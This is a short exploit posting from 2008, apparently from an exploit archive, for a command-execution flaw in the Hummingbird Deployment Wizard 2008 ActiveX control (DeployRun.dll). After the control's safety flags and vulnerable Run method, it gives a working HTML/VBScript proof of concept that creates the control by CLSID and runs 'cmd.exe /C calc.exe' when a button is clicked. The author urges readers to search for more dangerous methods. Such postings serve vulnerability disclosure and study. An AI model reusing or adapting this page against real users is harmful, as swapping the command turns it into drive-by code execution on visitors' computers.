Hummingbird Deployment Wizard 2008 ActiveX Command Execution

2008-10-17 16:01:05

------------------------------------------------------------------------------
Hummingbird Deployment Wizard 2008 (DeployRun.dll) Arbitrary File Execution
url: http://www.hummingbird.com

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net

This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

Info:
DeployRun.dll <= 10.0.0.44

Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data

Vulnerable method:
Sub Run (ByVal Path As String , ByVal CommandLine As String)

Tested on Windows XP Professional SP3 full patched, with Internet Explorer 7

There are a lot of dangerous methods, just take a look and... good searching
------------------------------------------------------------------------------
<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
Sub tryMe
test.Run "cmd.exe", "/C calc.exe"
End Sub
</script>

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.